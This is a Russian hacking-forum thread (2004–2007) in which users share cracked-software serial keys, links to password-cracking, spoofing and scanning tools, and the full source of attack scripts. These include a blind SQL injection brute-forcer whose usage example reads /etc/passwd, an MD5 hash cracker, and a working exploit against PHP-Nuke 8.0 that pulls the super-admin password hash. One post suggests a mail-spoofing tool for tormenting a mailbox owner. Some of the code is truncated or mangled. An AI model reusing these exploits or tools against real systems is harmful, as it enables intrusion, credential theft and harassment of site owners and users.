0NAFF-108TL-16J54-KC2XZ-CTMB8-UNiTED-CRACKiNG-FORCE-190666 or QE5FF-RH071-S1OUH-FQHXZ-C8CPH-UNiTED-CRACKiNG-FORCE-190666
Автор: Spidey 29.03.2004, 11:41
http://www.madalf.ru/cgi-bin/stetchik/bsdcc.pl?19 ( 375 kb - windows ) - Всем поможет. Программа для востановления утерянных паролей. Короче поможет.
Автор: anechka_19 12.04.2004, 23:02
http://mirror1.safety-lab.com/SSS.exe кряк на асталависте.. http://www.freeproxy.ru/download/socks_checker.exe там же куча других прожек для работы с проксями http://www.insidepro.com/download/passwordspro.zip Вообщем подбор MD5 и по словарю и брутофорсом и по маске. Так же еще и MD4 и показывает пароли скрытые звездочками.. но это не интересно.
Нравицца еще програмка Xavior Beta7 - подбор паролей через веб.. куча настроек. Она есть на этом сайте. В разделе soft.
Автор: anechka_19 12.04.2004, 23:13
Ах вот еще интересная програмка http://msender.chat.ru/mailsender.zip через нее можно отсылать мэйлы от чужого ящика и попортить немало нервов владельцу этого самого ящика и заставить его судорожно менять пароли ) Только она каким то не особо вредным вирусняком заражена.. Кто предупрежден - тот вооружен. Вообще-то подмену можно и через telnet устроить. Кому как нравицца.
Автор: cannabis 16.04.2004, 06:12
Check Proxy Professional has the following features:
- Managing / checking HTTP proxy lists; - Proxy list printing; - Proxy anonymity level detection; - Determines type of the proxy server (Anonymous/Transparent); - Determines speed of the proxy server; - Determines Location (country) of the proxy server; - Recognize different formats of proxy list (separated by colon, spaces, tabs, etc.); - Proxy finder (Proxy Hunter); - Supports multi-threading (can check many proxies simultaneously); - Daily updates of the database.
да и ще такойвот нюк,все по той же теме: Новый нюкер для Windows. Быстрый и маленький, с возможностью остановить в нужный момент, с возможностью подмены IP адреса и контролем ошибок...
А http://www.nirsoft.net/utils/pspv.zip (30 кб) «восстанавливает» информацию автозаполнения и Protected Storage (пароли для доступа к FTP-серверам и других мест) в IE и MSN Explorer (логин/пароль), пароли от POP3 аккаунтов Outlook Express. Точно также всю необходимую информацию можно копировать буфер или сохранять в файл в текстовых и html форматах
Автор: Swen47 14.11.2004, 09:06
Mail PassView Прога позволяет посмотреть пасс для почтовых программ. Непроверял из-за отсутствия таковых.
Автор: Micro 15.11.2004, 22:04
http://www.nirsoft.net/utils/iecv.zip (95 кб) служит для просмотра детальной информации о куках (поддерживается только IE). Можно сортировать все куки по люой колонке, находить нужное путем указания имени сайта, удалять нежелательные, сохранять в обычный текстовый файл, копировать информацию в буфер, просматривать куки других пользователей (если есть доступ), изменять содержимое и т.д.
Автор: Micro 16.11.2004, 15:36
Swen47 Ой не рассмотрел ты её не туда запихал
Добавлено @ [mergetime]1100608926[/mergetime] Крохотная программа whois-клиент, позволяющая получить информацию о любом домене — http://www.gena01.com/win32whois/win32whois_0_9_1.zip (13 кб). Можно получать контактную, инфоормацию о DNS-серверах, блок ip-адресов и т.д. Подробнее на http://www.gena01.com/win32whois. Вроде не было
Автор: Swen47 16.11.2004, 16:58
http://bmerussia.com/0day/SmartWhois3.6.exe
Автор: Micro 17.11.2004, 18:21
1st Ip Port Scanner v2.0 Иногда нас всех тянет на дела хакерские. Например - просканировать диапазон ip на предмет открытых портов. Программа показала себя в тесте как качественный продуманный продукт. Возможность выбирать тип пинга и резолв ипов в хостнеймы. Диапазон сканируемых портов. Да и интерфейс радует. В поле отображения результатов выводятся в древовидной структуре ответившие на запрос машины и название сервисов, висящих на их открытых портах. Очень удобно!
http://195.96.182.180/uinz.ru/1111/1st.Ip.Port.Scanner.v2.0.Cracked-EXPLOSiON_UINZ.ru.zip [1.1 MB] Взято с http://www.uinz.ru/
Автор: bdrFsg 22.11.2004, 17:48
Blue`s Port Scanner 5.0.2 - megaspeed!http://www.xakep.ru IP Tools 2.20 рулеззhttp://www.xakep.ru Putty - не помешает!
Автор: jur15t 29.01.2005, 16:16
может надо кому... http://secondarytester.narod.ru/new/NScan.exe
Автор: CMEP4 23.02.2005, 22:46
универсальный сканер из 15 инструментов. очень жаль что не поддерживает udp для регистрации name rth77! code A9D206B673EC72DB71A353CDC987788211B6C0BE09F366EF9E2B4E025CC25BA1609783C3E1AEDC66 5827927997FEFB0ED2253DB1DA23373A4221B0B455396FBDDD6AFFD1A0B73CA6D9BDA7107985903C
А чего ни одного линка на закачку? И программа WWWHack, насколько я помню, для получения http форм сайта, а не для взлома паролей...хотя могу ошибаться!
ссылка http://www.wwwhack.com/
Автор: Creeping Death 14.08.2006, 01:10
ArabianAttacker (WHTK) 1.0
Download it from here : http://www.tm-world.net/ArabianAttacker/Download/ArabianAttacker-(WHTK).zip
other files : netcat mswi (MySQL-Web-Interface) cgi-telnet e-mailLlistMackeR IP-Logger backdoor
Автор: LEVIAFAN 19.08.2006, 12:18
Cain & Abel v2.7.5 for Windows NT/2000/XP
http://www.oxid.it/downloads/ca_setup.exe
Автор: Creeping Death 18.09.2006, 16:03
NST Simple HTTP Scanner is a tool programmed in C to find vulnerabilities on remote web servers by looking for files and directories.
The version 0.4 was released. In this version i implemented the POSIX threads (pthread). This way, the scanning its much more faster. Compiling the scanner with pthreads under a Windows plataform it's not easy at all. Here you have a link with the pthread-win32lib files and a readme file with all the instructions to make the scan work with the library (pthread-win32lib was tested under Windows XP SP2 compiling with the IDE Dev-C++ 4.9.9.2): In the readme file of the scanner you can see how to compile the scanner under Linux (with GCC, adding the -lpthread for link the library) and under Windows.
New skills
- Security bugs fixed - HTML Report improved - New feature: subdomains scanning - New feature: option -u for updates check - New feature: use of POSIX threads (the scanner is much more faster) - Default requests.txt improved
http://www.cracklab.ru/download.php?action=get&n=MTU= Наверное самый лучший шестнадцатиричный редактор. Позволет редактировать файлы, память, диски, отображение адресации в HEX и десятичном формате, отображает значения, как байты, слова, двойные слова. Может конвертировать информацию (прибавлять, модифицировать по XOR). Может выдать исходники массива на паскале или си. Может производить автозамену по шестнадцатиричным значениям и по строкам. В общем, он лучший ! Хотя и не новинка для народа!
И ешо куча всякой хакерской всячины с этого сайта http://www.cracklab.ru/
Автор: Creeping Death 15.10.2006, 01:08
BitWise IM Personal 1.7.2
BitWise IM – IM клиент прямого общения и программа голосового чата, которая шифрует все сообщения и передаваемые данные.
BitWise IM работает с минимальным взаимодействием с сервером и позволяет работать в “безсерверном” режиме с поддержкой текстовых макросов, оффлайн сообщений, форвард на email, невидимый режим и многое другое. BitWise IM позволяет передавать файлы и содержит Web интерфейс для отправки сообщения и проверки оффлайн сообщений с любого компьютера, используя только Web браузер.
http://www.bitwiseim.com
Автор: [fR4g] 22.12.2006, 12:31
TrueCrypt v4.2a Прога для шифрования дисков / создания зашифрованных образов. Удобно делать зашифрованные флешки. OpenSource, FreeWare. Засим есть шансы, что нет лазеек для того, кто очень попросит. PS: Позволяет внутри существующего тома делать второй скрытый. http://www.truecrypt.org/downloads.php маст хэв.
Автор: self 28.12.2006, 13:08
tia, аналог :
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: Creeping Death 12.01.2007, 12:52
bsqlbfv1.2 скрипт для подбора запросов при слепой SQL-Injection
CODE
#!/usr/bin/perl # Blind SQL Injection POC. aramosf@514.es // http://www.514.es # # CHANGELOG: # Tue Jul 13 10:14:19 RST 2006 # + threads support. for hungry hackers. # Wed Jul 12 14:04:33 RST 2006 # + change sql teqneez mcdonalds powah 8) (more than 40% optimization) # please, rip me!!, make your own paper!! =] # + support for windows files (for example: C:\\boot.ini) # + support for " and 1="1 sql injection # + -binary and -ascii support # - -charset option removed # - -dict option removed # + upgrade to v1.2 # Sat Apr 1 03:13:01 CEST 2006 # + -get now support resume (with -start option) # Thu Mar 30 02:06:41 CEST 2006 # -get to fetch files (thank you ilo AGAIN) # ***** RELIABLE SPEED IMPROVEMENT USING SOME SKILLS OF SQL AND BRAIN!!*** # Sat Mar 25 13:57:39 CET 2006 # Release `haqerz edition` of bsqlbf: # + -time option added (IDS bypass) # + -rtime option added (IDS bypass) # + -rproxy option added (IDS bypass) # + -ruagent option added (IDS bypass) # Sun Dec 11 11:01:34 CET 2005 # + fixed automatch in POSTs # + better output # Mon Dec 5 18:30:03 CET 2005 # + added -blind option (to specify which attribute have sql injection). # Tue Nov 29 17:31:54 CET 2005 # + auto search match string (when they arent -match option) # Mon Nov 28 16:34:09 CET 2005 # + Support for POST and GET methods (-method get // -method post). # + Cookies support (-cookie "blah=foo; moo=doo"). # + UserAgent support (-uagent "SQL Blind tool"). # Wed Nov 23 23:44:23 RST 2005 # First version 0.1: # + code ripped from www.reversing.org <ilo[at]reversing.org> (thanks!) # # # TODO: # [ ] Rip more code from others.
use LWP::UserAgent; use Getopt::Long; use IO::Handle; use strict; use threads; use threads::shared; use Time::HiRes qw( usleep);
$| = 1;
############################################################################### my $default_debug = 0; my $default_length = 32; my $default_method = "GET"; my $default_time = 0; my $version = "1.2"; my $default_useragent = "bsqlbf $version"; my $default_sql = "version()"; ###############################################################################
$| = 1;
my ($args, $solution); my (%vars, @varsb); my ($lastvar, $lastval); my ($scheme, $authority, $path, $query, $fragment); my ($head, $tail, $high); my $hits = 0; my $amatch = 0; my ($ua,$req); my $furl;
############################################################################### # Define GetOpt: my ($url, $sql, $time, $rtime, $match, $uagent, $debug); my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent); my ($start, $length, $method, $cookie, $blind); my ($help, $get); my ($ascii, $binary);
if (!$match) { print "\nTrying to find a match string...\n" if $debug == 1; $amatch = "1"; $match = fmatch("$url"," AND 1="); if ($match eq "no vulnerable") { print "\nNo vuln: 2nd..\n" if $debug ==1; $match = fmatch("$url","\" AND 1=\""); $head = "\""; $tail = " AND 1=\"1"; }; if ($match eq "no vulnerable") { print "Not vulnerable or use -blind\n"; exit 0; } }
&banner(); &httpintro();
( ! $get) ? sqlget() : fileget();
my @byte = (); my $wait_me;
sub getbyte { my $sql = $_[0]; my $bit=""; my @thread_count = (); my $c = 8; my $i = 0; $high = 128 unless $ascii;#) ? 128 : { 64; $byte[0] = 0; }; $wait_me = 0;
while ($wait_me <= 7) { usleep(50); #sleep(1);# if !$dontsleep; }
my $str = join("",@byte); #print "\nSTR: $str\n"; return pack("B*","$str");
}
sub launch_thread { my ($sql, $bit, $c) = @_; my $val = "$head and (ord($sql) %26 $bit)=0 $tail"; #print "VAL[$c] $val\n"; if (lc($method) eq "post") { $vars{$lastvar} = $lastval . $val; } $furl = $url; $furl =~ s/($lastvar=$lastval)/$1$val/; &createlwp if $rproxy || $ruagent; my $html=fetch("$furl"); $hits++; foreach (split(/\n/,$html)) { lock @byte; if (/\Q$match\E/) { $byte[$c]=0; last; } else { $byte[$c] = 1; } } lock $wait_me; threads->yield(); $wait_me++; }
sub sqlget { my ($fsize,$i,$s); $s = "mid(length(length($sql)),1,1)"; my $lng .= getbyte($s); for ($i=1;$i<=$lng;$i++) { $s = "mid(length($sql),$i,1)"; $fsize.=getbyte($s); }
sub createlwp { my $proxyc; &getproxy; &getuagent if $ruagent; LWP::Debug::level('+') if $debug gt 3; $ua = new LWP::UserAgent( cookie_jar=> { file => "$$.cookie" }); $ua->agent("$uagent"); if (defined($proxy_user) && defined($proxy_pass)) { my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) = $proxy =~ m|^(?:([^:/?#]+)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|; $proxyc = $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority; } else { $proxyc = $proxy; }
$ua->proxy(['http'] => $proxyc) if $proxy; undef $proxy if $rproxy; undef $uagent if $ruagent; }
sub cookie { # Cookies check if ($cookie || $cookie =~ /; /) { foreach my $c (split /;/, $cookie) { my ($a,$b) = split /=/, $c; if ( ! $a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; } } } }
sub parseurl { ############################################################################### # Official Regexp to parse URI. Thank you somebody. ($scheme, $authority, $path, $query, $fragment) = $url =~ m|^(?:([^:/?#]+)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|; # Parse args of URI into %vars and @varsb. foreach my $varval (split /&/, $query) { my ($var, $val) = split /=/, $varval; $vars{$var} = $val; push(@varsb, $var); } }
######################################################################### # Show options at running: sub banner { print "\n // Blind SQL injection brute force.\n"; print " // aramosf\@514.es / http://www.514.es\n\n"; }
######################################################################### # Get differences in HTML sub fmatch { my ($ok,$rtrn); my ($furla, $furlb,$quote) = ($_[0], $_[0],$_[1]); my ($html_a, $html_b); if (lc($method) eq "get") { $furla =~ s/($lastvar=$lastval)/$1 ${quote}1/; $furlb =~ s/($lastvar=$lastval)/$1 ${quote}0/; $html_a = fetch("$furla"); $html_b = fetch("$furlb"); } elsif (lc($method) eq "post") { $vars{$lastvar} = $lastval . " ${quote}1"; $html_a = fetch("$furla"); $vars{$lastvar} = $lastval . " ${quote}0"; $html_b = fetch("$furla"); $vars{$lastvar} = $lastval; }
#print "$html_a"; #print "$html_b";
if ($html_a eq $html_b) { $rtrn = "no vulnerable"; return $rtrn; }
my @h_a = split(/\n/,$html_a); my @h_b = split(/\n/,$html_b); foreach my $a (@h_a) { $ok = 0; if ($a =~ /\w/) { foreach (@h_b) { if ($a eq $_) {$ok = 1; } } } else { $ok = 1; } $rtrn = $a; last if $ok ne 1; } return $rtrn; }
######################################################################### # Fetch HTML from WWW sub fetch { print "fetch: $_[0]\n"; my $secs; if ($time == 0) { $secs = 0 } elsif ($time == 1) { $secs = 15 } elsif ($time == 2) { $secs = 300 } if ($rtime =~ /\d*-\d*/ && $time == 0) { my ($l,$p) = $rtime =~ m/(\d+-\d+)/; srand; $secs = int(rand($p-$l+1))+$l; } elsif ($rtime =~ /\d*-\d*/ && $time != 0) { print "You can't run with -time and -rtime. See -help.\n"; exit 1; } sleep $secs;
my $res; if (lc($method) eq "get") { my $fetch = $_[0]; if ($cookie) { $res = $ua->get("$fetch", Cookie => "$cookie"); } elsif (!$cookie) { $res = $ua->get("$fetch"); } } elsif (lc($method) eq "post") { my($s, $a, $p, $q, $f) = $url=~m|^(?:([^:/?#]+)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|; my $fetch = "$s://$a".$p; if ($cookie) { $res = $ua->post("$fetch",\%vars, Cookie => "$cookie"); } elsif (!$cookie) { $res = $ua->post("$fetch",\%vars); } } else { die "Wrong httpd method. Use -h for help\n"; } my $html = $res->content(); return $html; }
sub getproxy { if ($rproxy && $proxy !~ /http/) { my @lproxy; open PROXY, $rproxy or die "Can't open file: $rproxy\n"; while(<PROXY>) { push(@lproxy,$_) if ! /^#/ } close PROXY; srand; my $ind = rand @lproxy; $proxy = $lproxy[$ind]; } elsif ($rproxy && $proxy =~ /http/) { print "You can't run with -proxy and -rproxy. See -help.\n"; exit 1; } }
sub getuagent { my @uproxy; open UAGENT, $ruagent or die "Can't open file: $ruagent\n"; while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ } close UAGENT; srand; my $ind = rand @uproxy; $uagent = $uproxy[$ind]; chop($uagent); }
sub result { print "\r results: \n" . " $sql = $solution\n" if length($solution) > 0; print " total hits: $hits\n"; }
sub help { &banner(); print " usage: $0 <-url http://www.host.com/path/script.php?foo=bar> [options]\n"; print "\n options:\n"; print " -sql:\t\tvalid SQL syntax to get; connection_id(), database(),\n"; print "\t\tsystem_user(), session_user(), current_user(), last_insert_id(),\n"; print "\t\tuser() or all data available in the requested query, for\n"; print "\t\texample: user.password. Default: version()\n"; print " -blind:\tparameter to inject sql. Default is last value of url\n"; print " -match:\tstring to match in valid query, Default is try to get auto\n"; print " -start:\tif you know the beginning of the string, use it.\n"; print " -length:\tmaximum length of value. Default is $default_length.\n"; print " -time:\t\ttimer options:\n"; print " \t0:\tdont wait. Default option.\n"; print " \t1:\twait 15 seconds\n"; print " \t2:\twait 5 minutes\n"; print " -rtime:\twait random seconds, for example: \"10-20\".\n"; print " -method:\thttp method to use; get or post. Default is $default_method.\n"; print " -uagent:\thttp UserAgent header to use. Default is $default_useragent\n"; print " -ruagent:\tfile with random http UserAgent header to use.\n"; print " -cookie:\thttp cookie header to use\n"; print " -rproxy:\tuse random http proxy from file list.\n"; print " -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n"; print " -proxy_user:\tproxy http user\n"; print " -proxy_pass:\tproxy http password\n"; print "\n examples:\n bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \"user()\"\n"; print " bash# $0 -url http://www.buggy.com/bug.php?r=514&p=3 -get \"/etc/passwd\"\n"; exit(1); }
Автор: Creeping Death 18.01.2007, 01:51
SQL Injection TooL
Программа SQL Injection TooL предназначена для изучения БД через ошибки в программном коде веб-сайтов, а точнее она использует т.н. SQL-инъекции.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 50 сообщений.
Автор: self 18.01.2007, 14:10
SAMInside 2.5.8.0
Описание программы
Восстановление паролей
Атака полным перебором: Данный вид атаки представляет собой полный перебор всех возможных вариантов паролей.
Атака полным перебором также включает в себя атаку распределенным перебором. Данный вид атаки позволяет использовать для восстановления паролей несколько компьютеров, распределив между ними обрабатываемые пароли. Этот вид атаки включается автоматически, когда пользователь устанавливает количество компьютеров, участвующих в атаке, более одного. После этого становится доступной возможность выбора диапазона паролей для атаки на текущем компьютере. Таким образом, чтобы начать атаку распределенным перебором, вам необходимо: Запустить программу на нескольких компьютерах. Выбрать во всех экземплярах программы нужное количество компьютеров для атаки. Установить одинаковые настройки для перебора на всех компьютерах. Выбрать для каждого компьютера свой диапазон перебора паролей. Запустить на каждом компьютере атаку полным перебором.
Атака по маске: Данный вид атаки используется, если есть определенная информация о пароле. Например: - Пароль начинается с комбинации символов "12345"; - Первые 4 символа пароля - цифры, остальные - латинские буквы; - Пароль имеет длину 10 символов и в середине пароля есть сочетание букв "admin"; - И т.д.
Настройки перебора по маске позволяют сформировать маску для перебираемых паролей, а также установить максимальную длину перебираемых паролей. Установка маски заключается в следующем - если вы не знаете N-й символ пароля, то включите N-й флажок маски и в соответствующем текстовом поле укажите маску для этого символа. Если же вы заранее знаете определенный символ пароля, то впишите его в N-е текстовое поле и снимите флажок маски.
В программе используются следующие символы маски: ? - Любой печатаемый символ (ASCII-коды символов 32...255). A - Любая заглавная латинская буква (A...Z). a - Любая строчная латинская буква (a...z). S - Любой специальный символ (!@#...). N - Любая цифра (0...9). 1...8 - Любой символ из соответствующего пользовательского набора символов.
Атака по словарям: Словарь - это текстовый файл, состоящий из часто употребляемых паролей типа 123 admin master и т.д.
Настройки атаки по словарям также включают и гибридную атаку, т.е. возможность добавлять к проверяемым паролям до 2 символов справа и слева, что позволяет восстанавливать такие пароли как "master12" или "#admin".
Атака по предварительно рассчитанным таблицам: Данный вид атаки использует Rainbow-технологию (http://www.antsight.com/zsl/rainbowcrack/) для создания предварительно рассчитанных таблиц.
Дополнительно: Для всех видов атак необходимо дополнительно указать - по каким хэшам (LM или NT) восстанавливать пароли.
Для атаки по словарям (в списке файлов словарей) и для атаки по Rainbow-таблицам (в списке файлов таблиц) необходимо отметить галочками те файлы, которые предполагается использовать в атаке.
Параметры командной строки
Программой можно управлять, используя следующие параметры командной строки:
-hidden : запуск программы в скрытом режиме;
-noreport : запрещает программе выдавать сообщения об окончании атаки;
-import : при загрузке программа сразу же выполнит автоматический импорт локальных пользователей;
-export : программа выполнит импорт локальных пользователей, сохранит результаты в файл SAMInside.OUT и завершит работу;
-minimize : запуск программы с минимизацией в трей. Дополнительные возможности программы Проверка пароля на всех пользователях, загруженных в программу. Для этого в текстовом поле "Current password:" введите нужный пароль и нажмите F2. После этого программа проверит данный пароль на всех пользователях, пароль к которым еще не найден.
"Скрытый режим" работы программы (Ctrl+Alt+H). При выборе этого режима программа исчезнет с экрана и с панели задач. Для возврата из скрытого режима нажмите эту же комбинацию клавиш.
Также в архиве с программой находятся следующие консольные утилиты для работы с файлами реестра SAM и SYSTEM: GetSyskey - программа извлекает из файла реестра SYSTEM системный ключ SYSKEY и сохраняет его в отдельный 16-байтовый файл.
GetHashes - программа извлекает хэши пользователей из файла реестра SAM, используя файл с ключом SYSKEY
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: Creeping Death 20.01.2007, 13:04
RMOSChange
Программа изменяет HTTP заголовки Internet Explorer, Firefox, Mozilla, так, что сервер(web-сайт), не сможет узнать какая у вас установлена ОС, версия браузера и язык системы.
Избавляет от установки виртуальной машины. конечно незабывем про proxy
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 50 сообщений.
Автор: Creeping Death 18.02.2007, 11:24
sqlmap
sqlmap is an automatic blind SQL injection tool, developed in python, capable of enumerating an entire remote database, performing an active database fingerprint and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.
Features
* Test of the remote url stability, based on page hash or string match; * Identification of url dynamic parameters; * Test numeric, string (single quote and double quotes) SQL injection on all url dynamic parameters and at first vulnerable it will be used to perform the future SQL injections; * Possible selection of HTTP method for testing and exploiting dynamic parameters, GET or POST (default: GET); * Fingerprint of web application database back-end based upon specific queries output which identify database characteristics and banner grabbing; * Random HTTP User-Agent header selection; * HTTP Cookie header provided, useful when web application requires authorization based on cookies and you an account; * Provide an anonymous HTTP proxy address to pass by request to the target url; * Other command line parameters to get database banner, enumerate databases, tables, columns, dump values, retrieve an arbitrary file content and provide own SQL expression to query remote database; * Debug output messages in verbose mode execution; * PHP setting magic_quotes_gpc evasion by encoding every query string, between single quotes, with CHAR (or similar) database function.
#!/usr/bin/perl # use strict; Sorry next time i'll use it;) # MD5 Hash Bruteforce Kit # by Iman Karim (iman.karim@smail.inf.fh-bonn-rhein-sieg.de) # URL : http://home.inf.fh-rhein-sieg.de/~ikarim2s/ # Date : 11.02.2007 # Info[0] : This Cracker is by far not the fastest! But it helped me alot to find "lost" passwords;) # Info[1] : Written under Kubuntu Linux (Throw away Windows!) # Info[2] : If you can code a bit perl, you can modify it to crack sha etc too... # Greets to: Invisible! $ver = "01"; $dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
if ($dbgtmr<=0){ die "Set dbgtmr to a value >=1 !\n";}; use Digest::MD5 qw(md5_hex); use Time::HiRes qw(gettimeofday);
if ($ARGV[0]=~"a") { $alpha = "abcdefghijklmnopqrstuvwxyz";} if ($ARGV[0]=~"A") { $alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";} if ($ARGV[0]=~"d") { $alpha = $alpha."1234567890";} if ($ARGV[0]=~"x") { $alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";}
if ($alpha eq "" or $ARGV[3] eq "") {usage();}; if (length($ARGV[3]) != 32) { die "Sorry but it seems that the MD5 is not valid!\n";};
print "Selected charset for attack: '$alpha\'\n"; print "Going to Crack '$ARGV[3]'...\n";
for (my $t=$ARGV[1];$t<=$ARGV[2];$t++){ crack ($t); }
sub usage{ print "\n\nMD5 Hash Bruteforce Kit v_$ver\n"; print "by Iman Karim (iman.karim\@smail.inf.fh-bonn-rhein-sieg.de)\n"; print "http:\/\/home.inf.fh-rhein-sieg.de\/~ikarim2s\/\n\n"; print "USAGE\n"; print "./md5crack <charset> <mincount> <maxcount> <yourMD5>\n"; print " Charset can be: [aAdx]\n"; print " a = {'a','b','c',...}\n"; print " A = {'A','B','C',...}\n"; print " d = {'1','2','3',...}\n"; print " x = {'!','\"',' ',...}\n"; print "EXAMPLE FOR CRACKING A MD5 HASH\n"; print "./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72\n"; print " This example tries to crack the given MD5 with all lowercase Alphas and all digits.\n"; print " MD5 Kit only tries combinations with a length from 1 and 3 characters.\n-------\n"; print "./md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72\n"; print " This example tries to crack the given MD5 with all lowercase Alphas and all uppercase Alphas.\n"; print " MD5 Kit only tries passwords which length is exactly 3 characters.\n-------\n"; print "./md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72\n"; print " This example tries to crack the given MD5 with nearly every character.\n"; print " MD5 Kit only tries combinations with a length from 1 to 10 characters.\n"; die "Quitting...\n"; }
sub crack{ $CharSet = shift; @RawString = (); for (my $i =0;$i<$CharSet;$i++){ $RawString[i] = 0;} $Start = gettimeofday(); do{ for (my $i =0;$i<$CharSet;$i++){ if ($RawString[$i] > length($alpha)-1){ if ($i==$CharSet-1){ print "Bruteforcing done with $CharSet Chars. No Results.\n"; $cnt=0; return false; } $RawString[$i+1]++; $RawString[$i]=0; } } ################################################### $ret = ""; for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);} $hash = md5_hex($ret); $cnt++; $Stop = gettimeofday(); if ($Stop-$Start>$dbgtmr){ $cnt = int($cnt/$dbgtmr); print "$cnt hashes\\second.\tLast Pass '$ret\'\n"; $cnt=0; $Start = gettimeofday(); } print "$ARGV[3] != $hash ($ret)\n"; if ($ARGV[3] eq $hash){ die "\n**** Password Cracked! => $ret\n"; } ################################################### #checkhash($CharSet)."\n";
if ($ARGV[3] eq $hash){ die "\n**** Password Cracked! => $ret\n"; }
}
Автор: Creeping Death 25.03.2007, 15:12
PHP-nuke <=8.0 Final
CODE
#!/usr/bin/perl #0day exploit for PHP-nuke <=8.0 Final #Blind sql injection attack in INSERT syntax #version for mysql >= 4.0.24, using 'brute force' #Coded by:Maciej `krasza` Kukla[krasza@gmail.com] #Screenshot: #0day exploit for PHP-nuke <=8.0 Final #Sql injection attack in INSERT syntax #Coded by:Maciej `krasza` Kukla[krasza@gmail.com] # #[+]Time normal query: 2 seconds #[+]Length user's record: 5 #[+]Length password's record: 32 #[+]Login: #admin #[+]Password: #b481ab90de84a345c665f1e4ef3c2 #[+]Super admin: #admin:b481ab90de84a345c66585e1f4cf16e4 use strict; use warnings; use LWP; my $offset=4;#It is the most important variable!! my $adres=shift or help(); my $ua = LWP::UserAgent->new; my $zadanie = HTTP::Request->new(GET => $adres); my ($respone,$komenda,$poczatek,$koniec,$czas_nor,$i,$j,$dlugosc_user,$user, $hash,$referer,$czy_dziala,$znak); banner(); $czas_nor=polacz("http://www.krasza.int.pl"); print "[+]Time normal query: $czas_nor seconds\n"; $dlugosc_user=ustal_dlugosc("aid",8); print "[+]Length user's record: $dlugosc_user\n"; print "[+]Length password's record: 32\n"; print "[+]Login:\n"; $user=brute_force_aid($dlugosc_user); print "[+]Password:\n"; $hash=brute_force_pass(32); print "[+]Super admin:\n"; print "$user:$hash\n"; ## sub brute_force_pass{ my ($dlugosc)=@_; my ($i,$j,$referer,$wynik,$dolny_zakres); for($i=1;$i<=$dlugosc;$i++){ for($j=48;$j<=122;$j++){
$referer="http://www.krasza.int.pl'),(-1, (SELECTIF((ASCII(SUBSTRING(`pwd`,".$i.", 1))=".$j.") & 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=1))/*"; $czy_dziala=czy_dziala($referer); if($czy_dziala==1){ $znak=chr($j); print "$znak"; $wynik.=$znak; if($i<$dlugosc){ $i+=1; $j=47; }else{ last; } } #przeskok-optymalizacja;] if($j==57){ $j=96; } } } print "\n"; return $wynik; } sub brute_force_aid{ my ($dlugosc)=@_; my ($i,$j,$referer,$wynik,$dolny_zakres); for($i=1;$i<=$dlugosc;$i++){ for($j=48;$j<=122;$j++){
$referer="http://www.krasza.int.pl'),(-1, (SELECTIF((LENGTH(`".$pole."`)>". $len.") & 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=1))/*"; $czy_dziala=czy_dziala($referer); if($czy_dziala==1){ $narazie_dziala_liczba=$len+1; $len+=2; }else{ $nie_dziala_liczba=$len+1; $len-=1; } } print "[-]Exploit Failed\n"; exit; } sub czy_dziala{ my ($refik)=@_; my $czas_zapytania; $czas_zapytania=polacz($refik); if($czas_zapytania>$czas_nor+$offset){ return 1; }else{ return 0; } } sub polacz{ my ($referrer)=@_; my ($czas,$czas_poczatek,$czas_koniec); $zadanie->referer($referrer); $czas_poczatek=time(); $respone=$ua->request($zadanie); $respone->is_success or die "$adres : ",$respone->message,"\n"; $czas_koniec=time(); $czas=$czas_koniec-$czas_poczatek; return $czas; } sub banner{ print "0day exploit for PHP-nuke <=8.0 Final\n"; print "Blind sql injection attack in INSERT syntax\n"; print "version mysql >= 4.0.24, using 'brute force'\n"; print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n"; } sub help{ print "0day exploit for PHP-nuke <=8.0 Final\n"; print "Blind sql injection attack in INSERT syntax\n"; print "version mysql >= 4.0.24, using 'brute force'\n"; print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n"; print "Use:\n"; print "\tperl exploit.pl http://\n";%20%20%20%20%20%20%20%20print%20"\t%5burl%5d-vicitim%20webpage%20with%20index.php\n";%20%20%20%20%20%20%20%20print%20"Example:\n";%20%20%20%20%20%20%20%20print%20"\tperl%20bruteforce.pl%20%5burl= exit(0); }
Автор: Creeping Death 25.03.2007, 21:29
ВНИМАНИЕ!
в данной разрешены посты, с просьбой о нахождении той или иной программы, НО: 1)должно быть четко и "по-русски" описано, что конкретно надо 2)под какую платформу программа нужна.
после выполнения заявки, одним из форумчан, посты с просьбами будут удаляться.
заявки по развитию, улучшению данной темы, пожалуйста, в ПМ
Код
Арсенал хакера. Так и представляются стойки с копьями мечами,манекены с надетыми доспехами.. А в уголках пылятся метательные кинжалы и колчаны.Ведь есть копьё и тыкай ним пока не найдёшь щель в доспехах..Но пока не умер хранитель арсенал никогда не будет пустовать.И все новые и новые последователи хранителя приносят снаряжение и бережно раскладывают его по полкам уходящим в непроглядный мрак Сети. (c)bdrFsg
